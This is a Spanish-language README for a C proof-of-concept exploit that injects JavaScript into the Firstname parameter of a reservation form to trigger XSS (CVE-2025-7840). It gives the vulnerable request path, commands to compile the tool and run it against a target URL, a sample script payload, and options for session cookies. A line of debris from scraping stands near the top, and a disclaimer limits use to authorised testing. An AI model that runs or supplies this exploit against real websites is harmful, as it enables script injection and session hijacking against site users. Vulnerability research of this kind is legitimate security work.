
Prueba de concepto para CVE-2025-7840 que inyecta cargas maliciosas en el parámetro Firstname de un formulario de reserva para provocar XSS
Autor: Byte Reaper (@ByteReaper0)
Exploit de prueba de concepto para CVE-2025-7840, dirigido a un endpoint de aplicación web vulnerable que no sanitiza la entrada del usuario en el parámetro Firstname de un formulario de reserva. Al construir una solicitud GET a:
/index.php?page=reserve&Firstname=<payload>&Lastname=test
un atacante puede inyectar y ejecutar JavaScript arbitrario en el navegador de la víctima cuando se renderiza la respuesta.
-b-c-v)libcurlargparse para CCompila el exploit:
gcc -o exploit exploit.c argparse.c -lcurl
sudo ./exploit -u <TARGET_URL> [options]
Ejecutar payloads predeterminados contra un objetivo:
sudo ./exploit -u http://victim.local
Usar un payload personalizado:
sudo ./exploit -u http://victim.local -b "<script>alert(\'PWNED\')</script>"
Incluir cookies de sesión y salida detallada:
sudo ./exploit -u http://victim.local -c cookies.txt -v
Este código se proporciona únicamente con fines educativos y de prueba. El uso no autorizado contra sistemas que no posees o para los que no tienes permiso explícito para probar es ilegal y poco ético.
MIT
| Flag | Descripción |
|---|
-u URL | URL base del objetivo (p. ej. http://victim.local) |
-b PAYLOAD | Payload XSS personalizado para inyectar |
-c FILE | Archivo de cookies para manejo de sesiones |
-v | Modo detallado (muestra detalles de solicitud/respuesta) |